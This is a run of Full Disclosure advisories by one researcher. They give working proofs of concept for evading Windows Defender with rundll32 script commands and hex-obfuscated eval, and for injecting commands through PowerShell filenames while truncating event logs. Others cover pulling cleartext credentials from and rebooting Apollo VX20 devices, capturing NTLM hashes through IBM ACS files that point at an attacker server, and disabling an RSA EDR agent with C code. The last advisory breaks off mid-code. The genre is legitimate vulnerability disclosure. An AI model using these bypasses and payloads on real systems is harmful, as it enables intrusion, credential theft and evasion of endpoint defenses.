[FD] Microsoft Windows Defender / Backdoor:JS/Relvelshe.A / Detection Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Detection Mitigation Bypass Backdoor:JS/Relvelshe.A [CVE Reference] N/A [Security Issue] Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated. However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post. [References] https://twitter.com/hyp3rlinx/status/1480657623947091968 [Exploit/POC] 1) python -m http.server 80 2) Open command prompt as Administrator 3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+" http://localhost/yo.tmp";) Create file and host on server, this is contents of the "yo.tmp" file. try{ <![CDATA[ var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } eval(str) ]]> }catch(e){ eval(str) } [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / VBScript Detection Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender VBScript Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine. Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with an "Access is denied" message. Trojan:Win32/Powessere.G Category: Trojan This program is dangerous and executes commands from an attacker. However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection. Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing. E.g. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) [References] https://twitter.com/hyp3rlinx/status/1759260962761150468 https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ [Exploit/POC] C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) Access is denied. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) We win! [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 3
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again. The fix was short lived as I find yet another third trivial bypass soon after. [Exploit/POC] Open command prompt as Administrator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13) Access is denied. C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX') [Video PoC URL] https://www.youtube.com/watch?v=yn9gdJ7c7Kg [Network Access] Local [Severity] High [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt https://twitter.com/hyp3rlinx/status/1755417914599956833 https://twitter.com/hyp3rlinx/status/1758624140213264601 [Disclosure Timeline] Vendor Notification: February 16, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 2.
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing. [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt [Exploit/POC] Open command prompt as Administrator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) Access is denied. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) Multi-commas, for the Win! [Network Access] Local [Severity] High [Disclosure Timeline] February 7, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - Credentials Disclosure / CVE-2024-25735
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Incorrect Access Control (Credentials Disclosure) [Affected Component] Web interface, config [Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58 [CVE Reference] CVE-2024-25735 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request. The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config E.g. HTTP response snippet: :{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"} ,"softAp":{"password":"12345678","router":"y","softAp":"y"}... [Exploit/POC] import requests target="https://x.x.x.x"; res = requests.get(target+"/device/config", verify=False) idx=res.content.find('{"password":') if idx != -1: idx2=res.content.find('router') if idx2 != -1: print("[+] CVE-2024-25735 Credentials Disclosure") print("[+] " + res.content[idx + 1:idx2 + 11]) print("[+] hyp3rlinx") else: print("[!] Apollo vX20 Device not vulnerable...") [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Wyrestorm Apollo VX20 / Account Enumeration / CVE-2024-25734
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Account Enumeration [CVE Reference] CVE-2024-25734 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered. Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account. [Exploit/POC] TELNET x.x.x.x 23 username:aa username:bb username:admin password: [Network Access] Remote [Affected Product Code Base] APOLLO VX20 - < 1.3.58, fixed in v1.3.58 [Severity] Medium [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - DoS / CVE-2024-25736
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Incorrect Access Control (DOS) [Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58 [Affected Component] Web interface, reboot and reset commands [CVE Reference] CVE-2024-25736 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request. [Exploit/POC] curl -k https://192.168.x.x/device/reboot [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ibm.com [Product] IBM i Access Client Solutions [Versions] All [Remediation/Fixes] None [Vulnerability Type] Remote Credential Theft [CVE Reference] CVE-2024-22318 [Security Issue] IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations. Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server. If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session. The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials. [References] https://www.ibm.com/support/pages/node/7116091 [Exploit/POC] The client access .HOD File vulnerable parameters: 1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c [KeyRemapFile] 2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv The client access legacy .WS File vulnerable parameters: DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c Example, client access older .WS file [Profile] ID=WS Version=9 [Telnet5250] AssociatedPrinterStartMinimized=N AssociatedPrinterTimeout=0 SSLClientAuthentication=Y HostName=PWN AssociatedPrinterClose=N Security=CA400 CertSelection=AUTOSELECT AutoReconnect=Y [KeepAlive] KeepAliveTimeOut=0 [Keyboard] IBMDefaultKeyboard=N DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c [Communication] Link=telnet5250 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: December 14, 2023 Vendor Addresses Issue: February 7, 2024 February 8, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] RansomLord v2 - Anti-Ransomware Exploitation Tool / New Release
RansomLord v2 - Anti-Ransomware Exploitation Tool [Description] RansomLord is a proof-of-concept Anti-Ransomware exploitation tool that generates PE files, used to exploit vulnerable Ransomware pre-encryption. Lang: C SHA256 : 8EA83752C4096C778709C14B60B9735CC68A5971DCDB0028A0BB167550554769 This version now intercepts and terminates malware tested from 43 different threat groups. Adding Wagner, Hakbit, Paradise, Jaff, DoubleZero, Blacksnake, Darkbit, Vohuk, Medusa and Phobus. Two are wipers Wagner and DoubleZero supposedly used against entities in the Ukraine conflict. Updated the x32/x64 DLLs to exploit ten more vulnerable ransomware Added -s Security information flag section Lamer Security engines may incorrectly flag RansomLord DLLs as malicious! They are NOT! Win32 API export functions are stubs that simply call exit(1) Generated exploit DLL MD5 file hashes: x32: DFFBE7F79077E89197334764FE6882F4 x64: 5B54E12B8B944FDF64C091B0E6588E48 [Download] https://github.com/malvuln/RansomLord/releases/tag/v2 Malvuln ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Windows PowerShell Single Quote Code Execution / Event Log Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt [+] twitter.com/hyp3rlinx [+] twitter.com/malvuln [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Windows PowerShell Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows. [Vulnerability Type] PowerShell Single Quote Code Execution / Event Log Bypass [CVE Reference] N/A [Security Issue] In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure. On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution. However, if the filename gets wrapped in single quotes it failed, that is until now. [Single Quote Code Exec Bypass] Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename. The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated. Take the following three test cases using Defender API which takes a specially crafted filename. C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml" 1) Double quotes OK "Test;saps DOOM;.xml" 2) Single quotes FAILS 'Test;saps DOOM;.xml' 3) Single quotes BYPASS 'Test&DOOM;.xml' PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands. C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip' Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here and that it also excludes the .EXE portion in that filename. [PS Event Log Bypass] On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes. However, when bypassing PS single quotes, I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log. Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed. Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory) C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5 Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating. [PS Log ID 403 Snippet] Engine state is changed from Available to Stopped. Details: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=25 HostName=ConsoleHost HostVersion=5.1.19041.1682 HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0 HostApplication=powershell get-filehash 'Infected EngineVersion=5.1.19041.1682 [Exploit/POC] powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5 Run some malware plus bypass logging of true file name: C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5 PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename. Defender Anti-Malware API: powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip' Call ping cmd using double "&": C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5 Call a Windows cmd to Logoff the victim: C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip' We have options: A) to call commands use double "&" --> 'virus&logoff&test.zip' B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip' [References] https://github.com/hyp3rlinx/PSTrojanFile https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: circa 2019 December 27, 2023 : Public Disclosure [+] Disclaimer The information contained wit
[FD] Microsoft Defender Anti-Malware PowerShell API - Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt [+] twitter.com/hyp3rlinx [+] x.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows PowerShell [Vulnerability Type] Arbitrary Code Execution [CVE Reference] N/A [Security Issue] Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code. E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code. This vector builds upon my previous advisory and subsequent project PSTrojanFile. Requirements: 1) On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script 2) Executable file of same name as the parameter that lives nearby Examples: powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip" (Helper.exe lives on Desktop) Create directory ";saps Test", Test.exe, Test.cmd etc is on same CL path powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test" Create directory with semicolon, drop PE file named doom.exe in same path. powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom" TODO: Update PSTrojanFile [References] http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt https://github.com/hyp3rlinx/PSTrojanFile https://www.exploit-db.com/exploits/47248 https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender [Video PoC URL] https://www.youtube.com/watch?v=0Go6yJiRWP8 [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: circa (2019) December 7, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Windows PowerShell / Trojan File RCE revisited
Hi, Windows PowerShell Filename Code Execution POC Discovery: 2019 and revisited 2023 Since it still works, I dusted off and made minor improvements: Execute a remote DLL using rundll32 Execute an unintended secondary PS1 script or local text-file (can be hidden) Updated the PS1 Trojan Filename Creator Python3 Script First reported to Microsoft back in 2019 yet remains unfixed as of the time of this writing. Remote code execution via a specially crafted filename. https://github.com/hyp3rlinx/PSTrojanFile Thank you, hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] RSA NetWitness EDR Agent / Incorrect Access Control - Code Execution / CVE-2022-47529
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Securitywww.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References]https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E callcs:InitializeCriticalSection .text:0001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:0001400F7B28 callcs:InitializeCriticalSection .text:0001400F7B2E mov edx, 1 ; bManualReset .text:0001400F7B33 xor r9d, r9d; lpName .text:0001400F7B36 mov r8d, edx; bInitialState .text:0001400F7B39 xor ecx, ecx; lpEventAttributes .text:0001400F7B3B callcs:CreateEventW .text:0001400F7B41 mov [rbx+50h], rax .text:0001400F7B45 mov dword ptr [rbx+58h], 0 .text:0001400F7B4C testrax, rax .text:0001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E callcs:InitializeCriticalSection .text:0
[FD] RSA NetWitness Platform EDR / Incorrect Access Control - Code Execution
